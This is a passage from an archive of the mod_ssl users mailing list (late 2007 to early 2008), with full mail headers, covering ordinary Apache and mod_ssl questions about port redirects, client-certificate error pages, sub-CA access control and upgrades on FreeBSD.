>
> Hi Eric,
>
> perhaps the "-" has not the required ascii code. Did you copy that
> command from a website? Some fellows use long minus signs for better
> readability, so give it another try by typing the command line by hand.
>
> Greetings from Germany,
> Eckard
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 28 23:00:28 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A248114DA48; Fri, 28 Dec 2007 23:00:28 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from email01.consolidated.net (email01.consolidated.net [216.176.95.171])
	by master.modssl.org (Postfix) with ESMTP id F29CD14D858
	for ; Fri, 28 Dec 2007 23:00:27 +0100 (CET)
Received: from lfknpsmtp01.CONSOLIDATED.COM (mail.consolidated.com [207.70.131.15])
	by email01.consolidated.net (MOS 3.8.3-GA)
	with ESMTP id BMU29396;
	Fri, 28 Dec 2007 16:00:12 -0600 (CST)
Received: from mtnmail01.CONSOLIDATED.COM ([10.1.250.5])
          by lfknpsmtp01.CONSOLIDATED.COM (Lotus Domino Release 7.0.2FP2)
          with ESMTP id 2007122816001133-284994 ;
          Fri, 28 Dec 2007 16:00:11 -0600 
Subject: Christa A. Packer/consolidated is out of the office. 
From: Christa.Packer@consolidated.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 28 Dec 2007 16:00:10 -0600
MIME-Version: 1.0
X-MIMETrack: Serialize by Router on mtnmail01/consolidated(Release 7.0.1 HF638|July 30, 2007) at
 12/28/2007 04:00:11 PM,
	Itemize by SMTP Server on lfknpsmtp01/consolidated(Release 7.0.2FP2|May 14, 2007) at
 12/28/2007 04:00:11 PM,
	Serialize by Router on lfknpsmtp01/consolidated(Release 7.0.2FP2|May 14, 2007) at
 12/28/2007 04:00:12 PM,
	Serialize complete at 12/28/2007 04:00:12 PM
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christa.Packer@consolidated.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I will be out of the office starting  12/22/2007 and will not return until
01/02/2008.

I will be out of the office for the next few days.  I will get back to you
when I return

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan  2 18:11:07 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7EF1314D9EB; Wed,  2 Jan 2008 18:11:07 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from hrndva-omtalb.mail.rr.com (hrndva-omtalb.mail.rr.com [71.74.56.123])
	by master.modssl.org (Postfix) with ESMTP id 246B014D853
	for ; Wed,  2 Jan 2008 18:11:05 +0100 (CET)
Received: from [192.168.11.103] (really [24.209.185.188])
          by hrndva-omta03.mail.rr.com with ESMTP
          id <20080102171051.EXMZ2900.hrndva-omta03.mail.rr.com@[192.168.11.103]>
          for ; Wed, 2 Jan 2008 17:10:51 +0000
Mime-Version: 1.0 (Apple Message framework v753)
Content-Transfer-Encoding: 7bit
Message-Id: <6A428A89-29C4-4D99-8294-575D853CB729@cygnusinteractive.com>
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
To: modssl-users@modssl.org
From: James Ziller 
Subject: apache+ssl, appends internal SSL port number with no trailing slash - broken link
Date: Wed, 2 Jan 2008 11:10:50 -0600
X-Mailer: Apple Mail (2.753)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Ziller 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello all.  Thanks in advance for your expertise.

Details:

Centos 4.4
httpd-2.0.52-28.ent.centos4
openssl-0.9.7a-43.16
mod_ssl-2.0.52-28.ent.centos4


Problem:

Apache listens for SSL traffic internally on port 55106.
The gateway(keepalived/IPtables) forwards all external SSL requests  
from externalIP:443 to internalIP:55106.

This works fine, except when a directory is called WITHOUT a trailing  
slash.

IE:

secure/ is a directory that contains only a one line index.html file.

https://www.example.com:443/secure/  - works fine and reads index.html.
https://www.example.com:443/secure - doesnt work, and the URL gets  
redirected to https:/www.example.com:55106/secure!!

Port 55106 is not accessible externally. Is apache assuming more than  
it should about network configuration?  And most importantly, how can  
I stop this from happening?

I've disabled all SSL related rewrites.   I have also changed the  
internal SSL port number in the virtualhost config and sure enough, I  
am redirected to the new port number mysteriously by apache when the  
URL has no trailing slash...so it is definitely  something that  
happens dynamically based on the internal SSL port number that is  
defined within the virtual host.

I realize I could just rewrite a trailing slash, but this problem is  
much more far reaching that the simplified example I provided.   
Ideally I would like a solution that would apply to all instances of  
this problem across multiple directories and multiple sites.

Thanks,
James

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan  3 11:23:46 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 004C914DA2C; Thu,  3 Jan 2008 11:23:45 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from moutng.kundenserver.de (moutng.kundenserver.de [212.227.126.186])
	by master.modssl.org (Postfix) with ESMTP id BECD314D851
	for ; Thu,  3 Jan 2008 11:23:44 +0100 (CET)
Received: from faktl3.fakt.lc ([134.169.135.176])
	by mrelayeu.kundenserver.de (node=mrelayeu2) with ESMTP (Nemesis)
	id 0MKwtQ-1JANEY45nO-0007Uh; Thu, 03 Jan 2008 11:23:31 +0100
Message-ID: <477CB7A2.4020008@noltec.org>
Date: Thu, 03 Jan 2008 11:23:30 +0100
From: Christian Nolte 
User-Agent: Thunderbird 2.0.0.9 (X11/20071115)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Customizing error message when using certificate based authentification
X-Enigmail-Version: 0.95.5
Content-Type: text/plain; charset=ISO-8859-15
Content-Transfer-Encoding: 7bit
X-Provags-ID: V01U2FsdGVkX1+aE9Kpip6tGlIt7jdOD2cHcm1ffJskC72cel5
 VwyUAZg4j5A1FhL2VSOV9AVZ0BLr8G/fpAm1xhQEc7TmaceUgj
 siH6OcgZ4nHp2Md6V+KUe7WPpzOKHFM
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christian Nolte 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi!

I have set up certificate based authentication using

	SSLVerifyClient require

in my httpd.conf. Everything works fine but if a client does not have a
valid certificate Firefox gives an obscure error message:

	"www.example.com has received an incorrect or unexpected message. Error
Code: -12227"

Is there a way to give the client a normal error page, like e.g. for 404
errors?

Best regards!
Christian

- --
For more than 4 generations the IT Professionals were the guardians
of quality and stability in software. Before the dark times.
Before Microsoft...

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iD8DBQFHfLeiCNjA0nfhW7wRAgUMAKDHF5oLVSLa7YkSoDt7bYmRvFOAtwCgzgwS
7C8W5RdIMDHAeA3PYIJOBPk=
=XlfO
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan  3 16:26:12 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 69A0314DA33; Thu,  3 Jan 2008 16:26:12 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.nrlssc.navy.mil (mail2.nrlssc.navy.mil [128.160.25.4])
	by master.modssl.org (Postfix) with ESMTP id B1E6114D851
	for ; Thu,  3 Jan 2008 16:26:10 +0100 (CET)
Received: from ng-mail.nrlssc.navy.mil (localhost [127.0.0.1])
	by mail.nrlssc.navy.mil (8.13.7/8.13.7) with ESMTP id m03FPt16007307
	for ; Thu, 3 Jan 2008 09:25:56 -0600
Received: from [128.160.115.202] (kali.nrlssc.navy.mil [128.160.115.202])
	by ng-mail.nrlssc.navy.mil (8.13.7/8.13.7) with ESMTP id m03FQStO003663
	for ; Thu, 3 Jan 2008 09:26:29 -0600
Message-ID: <477CFE7E.9050105@nrlssc.navy.mil>
Date: Thu, 03 Jan 2008 09:25:50 -0600
From: "Roy Keene (Contractor)" 
Organization: Naval Research Laboratory
User-Agent: Thunderbird 2.0.0.9 (X11/20071031)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Customizing error message when using certificate based authentification
References: <477CB7A2.4020008@noltec.org>
In-Reply-To: <477CB7A2.4020008@noltec.org>
Content-Type: text/plain; charset=ISO-8859-15; format=flowed
Content-Transfer-Encoding: 7bit
X-TM-AS-Product-Ver: : ISVW-6.0.0.2339-5.0.0.1023-15638001
X-TM-AS-Result: : Yes--15.629400-0-31-1
X-TM-AS-Category-Info: : 31:0.000000
X-TM-AS-MatchedID: : =?us-ascii?B?MTUwNTY3LTE1MTI2MC03MDAw?=
	=?us-ascii?B?NzUtMTM5MDEwLTcwMDQ3Ni03MDI1MjAtMTIxNjI0LTcwMTA2Ni03?=
	=?us-ascii?B?MDE3NDEtNzEwNDQyLTcwODE5Ni03MDAwNzMtNzAyNzI2LTcwMzQy?=
	=?us-ascii?B?OC03MDE2MDQtNzA5NTg0LTcwMjQ4NS03MDI1MTMtNzAzMTI2LTEw?=
	=?us-ascii?B?NjM2MC0xMDY1ODAtNzAzMTc3LTE4ODAxOS03MDEyMjAtMTIxMzM0?=
	=?us-ascii?B?LTEzOTcwNC0xMjE1MjMtNzAwNzU2LTcwMTI0OS03MDY3MjYtNzA0?=
	=?us-ascii?B?ODIwLTcxMTIxMy03MDU5NjktMTIxMzU1LTcwMDA0MC03MDQ0MjEt?=
	=?us-ascii?B?NzAyMDIwLTcwMjExMy03MDc3ODgtNzAwODc0LTcwNTM4OC03MDM3?=
	=?us-ascii?B?ODgtNzAzMzk5LTcwMTIzNi03MDM3MjAtNzAyMTMxLTcwNzE1MS03?=
	=?us-ascii?B?MDQ3NTEtNzAwMDc3LTE0ODAzOS0xNDgwNTEtMjAwMjQtMjAwNDM=?=
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Roy Keene (Contractor)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Christian Nolte wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Hi!
> 
> I have set up certificate based authentication using
> 
> 	SSLVerifyClient require
> 
> in my httpd.conf. Everything works fine but if a client does not have a
> valid certificate Firefox gives an obscure error message:
> 
> 	"www.example.com has received an incorrect or unexpected message. Error
> Code: -12227"
> 
> Is there a way to give the client a normal error page, like e.g. for 404
> errors?
> 
> Best regards!
> Christian
> 
> - --
> For more than 4 generations the IT Professionals were the guardians
> of quality and stability in software. Before the dark times.
> Before Microsoft...
> 
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.7 (GNU/Linux)
> Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org
> 
> iD8DBQFHfLeiCNjA0nfhW7wRAgUMAKDHF5oLVSLa7YkSoDt7bYmRvFOAtwCgzgwS
> 7C8W5RdIMDHAeA3PYIJOBPk=
> =XlfO
> -----END PGP SIGNATURE-----
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


II. Tricks
    1. Redirect all HTTP requests to HTTPS
         a. Load mod_rewrite  (see:
            http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html )
         b. Add the following rule to your non-HTTPS server configuration
            (httpd.conf):
                 # Require HTTPS
                 RewriteEngine on
                 RewriteRule ^/(.*) https://${SERVER_NAME}/$1 [redirect=permanent]

    2. Redirect all requests that fail to authenticate to an error page
         a. Load mod_rewrite  (see:
            http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html )
         b. Add the following rule to your HTTPS server configuration
            (mod_ssl.conf):
                 i. Apache 1.3.x: (NOTE:  Internet Explorer does not work
                    correctly with Apache 1.3.x and mod_ssl when SSLVerifyClient
                    is set to anything except "none")
                         # Redirect client-verification-failures to a specific
                         # page.
                         RewriteEngine on
                         RewriteCond %{SSL_CLIENT_VERIFY} !^SUCCESS$
                         RewriteRule . /error-pages/pki/pki-invalid.html [last]
                 i. Apache 2.2.x:
                         # Redirect client-verification-failures to a specific
                         # page.
                         RewriteEngine on
                         RewriteCond %{SSL:SSL_CLIENT_VERIFY} !^SUCCESS$
                         RewriteRule . /error-pages/pki/pki-invalid.html [last]
         c. Change "SSLVerifyClient" to "optional" (NOTE:  Internet Explorer
            does not work correctly with Apache 1.3.x and mod_ssl when
            SSLVerifyClient is set to anything except "none")
                 SSLVerifyClient optional

-- 
	Roy Keene (Contractor)
	Office of Network Management (Code 7030.8)
	Naval Research Laboratory
	Stennis Space Center, MS 39529
	DSN 828-4827

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan  3 17:34:10 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 29A2C14DA31; Thu,  3 Jan 2008 17:34:10 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from fg-out-1718.google.com (fg-out-1718.google.com [72.14.220.156])
	by master.modssl.org (Postfix) with ESMTP id BF4A714D851
	for ; Thu,  3 Jan 2008 17:34:09 +0100 (CET)
Received: by fg-out-1718.google.com with SMTP id e12so3318241fga.7
        for ; Thu, 03 Jan 2008 08:33:55 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from:user-agent:mime-version:to:subject:content-type:content-transfer-encoding;
        bh=0AU3eX5M3t3qGI3A7ZEJqN65jf5mqb2mDqpTtTXVV/g=;
        b=OdBEEu2LMprIK3P+lo3yGlsD98COl0nDZRG6Pdr8GyT6yPN/8cVS1H1UHJxlEPSOMAs7ypqukpnvsVPyxSDHnpFMRRTt3mmoQf5kr9V08MYMQRkurV9rU7O0gnL3EE+aEj5tBgv3X2SAUkUFX9+9/hKs+nYqfhCgpXqdg6ZDhm8=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:user-agent:mime-version:to:subject:content-type:content-transfer-encoding;
        b=gQJCZJxPHwxk93jM+YIbOaB3FyjcefxA4/YGRH1LiBaswTu3zcmEdkuhl5Uhvqm8eAqQtAy+Qz9Sy6zF9ligoEqbarhM0QxOMg33lACr1XSa4uh4xR7r38gCicsAp8bLuUtnK3gaszhhqiSJi0gAeZ/1pnSzMjQ+SZ5zxvmT38E=
Received: by 10.86.51.2 with SMTP id y2mr15787814fgy.17.1199378035368;
        Thu, 03 Jan 2008 08:33:55 -0800 (PST)
Received: from ?192.168.1.20? ( [78.113.7.155])
        by mx.google.com with ESMTPS id l19sm17751578fgb.3.2008.01.03.08.33.52
        (version=TLSv1/SSLv3 cipher=RC4-MD5);
        Thu, 03 Jan 2008 08:33:53 -0800 (PST)
Message-ID: <477D0E6F.8060003@gmail.com>
Date: Thu, 03 Jan 2008 17:33:51 +0100
From: #Cyrille37# 
User-Agent: Thunderbird 2.0.0.9 (Windows/20071031)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: https problem: first connection Failed, next connections Ok
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: #Cyrille37# 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,
I've got problem with https :

At the first HTTPS connection the page is blank, but after a refresh 
(like pressing F5 on Firefox or IE) the page is well served.
Here is a link to see the problem :
    https://ns300019.ovh.net/
    https://ns300019.ovh.net/tools/env.php

The problem is appening on some of my servers but not with all of them. 
I'd compared softwares version but they are sames :

   Apache/1.3.39
   mod_ssl-2.8.30-1.3.39
   OpenSSL/0.9.6m
   Php5.1.6
   Linux 2.6.21.5

Have you got any idea ?
thanks
cyrille.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 11 23:19:19 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 22A8214DA6A; Fri, 11 Jan 2008 23:19:19 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from smtp-3.orange.nl (smtp-3.orange.nl [193.252.22.243])
	by master.modssl.org (Postfix) with ESMTP id 3430E14D836
	for ; Fri, 11 Jan 2008 23:19:17 +0100 (CET)
Received: from me-wanadoo.net (localhost [127.0.0.1])
	by mwinf6208.orange.nl (SMTP Server) with ESMTP id EE5C91C00083
	for ; Fri, 11 Jan 2008 23:19:03 +0100 (CET)
Received: from mail.overes.net (unknown [85.148.220.247])
	by mwinf6208.orange.nl (SMTP Server) with ESMTP id CB0B31C00081
	for ; Fri, 11 Jan 2008 23:19:03 +0100 (CET)
X-ME-UUID: 20080111221903831.CB0B31C00081@mwinf6208.orange.nl
Received: from [192.168.10.2] (co.overes.net [192.168.10.2])
	by mail.overes.net (Postfix) with ESMTP id 390FC52653
	for ; Fri, 11 Jan 2008 23:19:20 +0100 (CET)
Message-ID: <4787EB2D.7060800@overes.net>
Date: Fri, 11 Jan 2008 23:18:21 +0100
From: Carol Overes 
User-Agent: Thunderbird 2.0.0.6 (X11/20071022)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Differentiate web access based on sub CA's
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Overes-net-MailScanner: Found to be clean
X-Overes-net-MailScanner-From: carol@overes.net
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Carol Overes 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I have the following CA structure:

Root CA (cacert.pem)
|
|_ sub CA 'A' (subcaacert.pem)
|
|_ sub CA 'B' (subcabcert.pem)

The idea is give web access for certificates which are issued by sub CA 
'A'. Certificates issued by sub CA must be rejected. I don't want to use 
  things like SSLRequire directive to match certain fields in the 
certificate, but I want to use the structure of the CA. I use Apache 2.2.4.

Here is my first Apache configuration:

    SSLEngine on
    SSLVerifyClient require
    SSLVerifyDepth 1
    SSLCACertificateFile //cachain.pem
    SSLCertificateFile //cert.pem
    SSLCertificateKeyFile //key.pem

cachain.pem contains the Root CA and the sub CA 'A'. The cipher-blocks 
are added in the file in the described order. And I have also tried when 
the two certificates were merged like:

openssl x509 -outform PEM -in subcaacert.pem -in subcabcert.pem -out 
cachain.pem

When I connect with a certificate which is issued by sub CA 'A', I get 
the following error:

certificate chain too long (chain has 2 certificates, but maximum 
allowed are only 1)

It seems that the certificate chain length is greater than the supplied 
maximum depth. So, I changed to the following configuration:

    SSLEngine on
    SSLVerifyClient require
    SSLVerifyDepth 2
    SSLCACertificateFile //cachain.pem
    SSLCertificateFile //cert.pem
    SSLCertificateKeyFile //key.pem

I'm able to authenticate with my certificate, issued by sub CA 'A'. But 
I can also authenticate with a certificate which is issued by sub CA 'B'.

Instead of using SSLCACertificateFile I tried to use SSLCACertificatePath.

    SSLEngine on
    SSLVerifyClient require
    SSLVerifyDepth 2
    SSLCACertificatePath //
    SSLCertificateFile //cert.pem
    SSLCertificateKeyFile //key.pem

The directory where SSLCACertificatePath refers to, contains cacert.pem 
and subcaacert.pem. Also, hash symlinks are created in that directory 
with the Makefile 
(http://search.cpan.org/src/MADWOLF/OpenCA-PKCS7-0.9.13/test/chain/Makefile).

When I connect with a certificate issued by sub CA 'A' I get the 
following error:

Certificate Verification: Error (20): unable to get local issuer certificate

I'm kinda stuck at the moment. I have tried to google for some 
solutions, but I haven't found anything that is useful.

Can anyone advice me on how to solve this issue?

Thanks in advance for any help.

Kind regards,

Carol

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 21 19:47:20 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 81ABD14DA3B; Mon, 21 Jan 2008 19:47:20 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mx1.cpanel.net (mx1.cpanel.net [208.74.121.68])
	by master.modssl.org (Postfix) with ESMTP id D2B5814D847
	for ; Mon, 21 Jan 2008 19:47:19 +0100 (CET)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=default; d=cpanel.net;
	h=Received:Message-Id:From:To:Content-Type:Content-Transfer-Encoding:Mime-Version:Subject:Date:X-Mailer:X-AntiAbuse:X-AntiAbuse:X-AntiAbuse:X-AntiAbuse:X-AntiAbuse;
	b=Hi9tiq1Qj7gIwIxZEMLIFAkdzhG0Z6wiacwr9rvMKmO4w2c9ebXHO1NBj/XNMOJMc5ysuZ6A8OUgGq0uRcxnC62u0CMtvZqHM6ZyJnlTuJKkcG/otr60vaB7nmPoo+JR;
Received: from ng1.cptxoffice.net ([208.74.121.102] helo=[192.168.90.73])
	by mx1.cpanel.net with esmtpsa (TLSv1:AES128-SHA:128)
	(Exim 4.68)
	(envelope-from )
	id 1JH1fh-0003ac-E9
	for modssl-users@modssl.org; Mon, 21 Jan 2008 12:47:01 -0600
Message-Id: <5534B70A-BEA5-4EE4-AB33-65DB54576CC5@cpanel.net>
From: Dan Muey - cPanel Developer 
To: modssl-users@modssl.org
Content-Type: text/plain; charset=US-ASCII; format=flowed
Content-Transfer-Encoding: 7bit
Mime-Version: 1.0 (Apple Message framework v912)
Subject: Any ETA on mod ssl's update for apache 1.3.41?
Date: Mon, 21 Jan 2008 12:47:04 -0600
X-Mailer: Apple Mail (2.912)
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - mx1.cpanel.net
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - cpanel.net
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dan Muey - cPanel Developer 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Apache 1.3.41 announcement
http://www.apache.org/dist/httpd/Announcement1.3.html
ChangeLog for 1.3.41
http://www.apache.org/dist/httpd/CHANGES_1.3.41
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 22 03:54:34 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1B28A14DA6E; Tue, 22 Jan 2008 03:54:34 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from westnet.haddow.com.au (westnet.haddow.com.au [202.173.185.135])
	by master.modssl.org (Postfix) with ESMTP id 97FAC14D844
	for ; Tue, 22 Jan 2008 03:54:30 +0100 (CET)
Received: from server1.home.haddow.com.au (server1.home.haddow.com.au [192.168.100.5])
	by westnet.haddow.com.au (8.12.8p1/8.12.8) with ESMTP id m0M2sDlr047054
	for ; Tue, 22 Jan 2008 13:54:13 +1100 (EST)
	(envelope-from modssl@haddow.info)
Date: Tue, 22 Jan 2008 13:54:13 +1100 (EST)
From: modssl@haddow.info
X-X-Sender: shaddow@server1.home.haddow.com.au
To: modssl-users@modssl.org
Subject: Apache with Mod ssl on a system running apache on freebsd
Message-ID: <20080122135248.V54184@server1.home.haddow.com.au>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl@haddow.info
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Trying to upgrade a freebsd 6.1 that is running "Apache/1.3.39 (Unix)
PHP/5.2.4 with Suhosin-Patch" to include mod_ssl.

It makes, with no problems but when I install it, it requiers Apache to be
deinstalled, the big problem is that Apache has a few required packages
that can not be removed with out a lot of problems.

This system is running a lot of web sites that can not have any down time,
(or very little down time)

Does any one have any ideas on how to fix it, easily if possible

With thanks

Haddow
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 24 15:30:57 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3C6E514DA67; Thu, 24 Jan 2008 15:30:57 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from defout.telus.net (defout.telus.net [199.185.220.240])
	by master.modssl.org (Postfix) with ESMTP id B561C14D840
	for ; Thu, 24 Jan 2008 15:30:54 +0100 (CET)
Received: from priv-edtnaa05.telusplanet.net ([137.186.246.196])
          by priv-edtnes27.telusplanet.net
          (InterMail vM.7.08.02.02 201-2186-121-104-20070414) with ESMTP
          id <20080124143047.YTOO14609.priv-edtnes27.telusplanet.net@priv-edtnaa05.telusplanet.net>;
          Thu, 24 Jan 2008 07:30:47 -0700
Received: from [192.168.2.100] (d137-186-246-196.abhsia.telus.net [137.186.246.196])
	by priv-edtnaa05.telusplanet.net (BorderWare MXtreme Infinity Mail Firewall) with ESMTP
	id 6CR7BAJF9E; Thu, 24 Jan 2008 07:30:34 -0700 (MST)
Message-ID: <4798A117.2040003@daltons.ca>
Date: Thu, 24 Jan 2008 07:30:47 -0700
From: Aaron Dalton 
User-Agent: Thunderbird 2.0.0.9 (Windows/20071031)
MIME-Version: 1.0
To: modssl-users@modssl.org, modssl@haddow.info
Subject: Re: Apache with Mod ssl on a system running apache on freebsd
References: <20080122135248.V54184@server1.home.haddow.com.au>
In-Reply-To: <20080122135248.V54184@server1.home.haddow.com.au>
X-Enigmail-Version: 0.95.6
OpenPGP: id=8811D2A4;
	url=https://biglumber.com/x/web?qs=8811d2a4
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aaron Dalton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

modssl@haddow.info wrote:
> Trying to upgrade a freebsd 6.1 that is running "Apache/1.3.39 (Unix)
> PHP/5.2.4 with Suhosin-Patch" to include mod_ssl.
> 
> It makes, with no problems but when I install it, it requiers Apache to be
> deinstalled, the big problem is that Apache has a few required packages
> that can not be removed with out a lot of problems.
> 

You should be able to do a full "make" without deinstalling the old 
Apache.  If make words, then it should only take a minute to do a "make 
deinstall reinstall."  Of course, this doesn't account for time tweaking 
the conf files and debugging.  This is why you really need a development 
machine that is essentially a mirror of the critical app server so you 
can do test runs and such.  Or a 2nd (or 3rd) app server for redundancy 
if this server is so important.  In any case, you *will* at some point 
have to down your web server to do the upgrade.  That is unavoidable.

-- 
Aaron Dalton       |   Super Duper Games
aaron@daltons.ca   |   http://superdupergames.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 25 05:14:50 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 88BFA14DA4C; Fri, 25 Jan 2008 05:14:50 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from westnet.haddow.com.au (westnet.haddow.com.au [202.173.185.135])
	by master.modssl.org (Postfix) with ESMTP id 1EFC814D84C
	for ; Fri, 25 Jan 2008 05:14:47 +0100 (CET)
Received: from server1.home.haddow.com.au (server1.home.haddow.com.au [192.168.100.5])
	by westnet.haddow.com.au (8.12.8p1/8.12.8) with ESMTP id m0P4ESlr002072
	for ; Fri, 25 Jan 2008 15:14:30 +1100 (EST)
	(envelope-from modssl@haddow.info)
Date: Fri, 25 Jan 2008 15:14:28 +1100 (EST)
From: modssl@haddow.info
X-X-Sender: shaddow@server1.home.haddow.com.au
To: modssl-users@modssl.org
Subject: Re: Apache with Mod ssl on a system running apache on freebsd
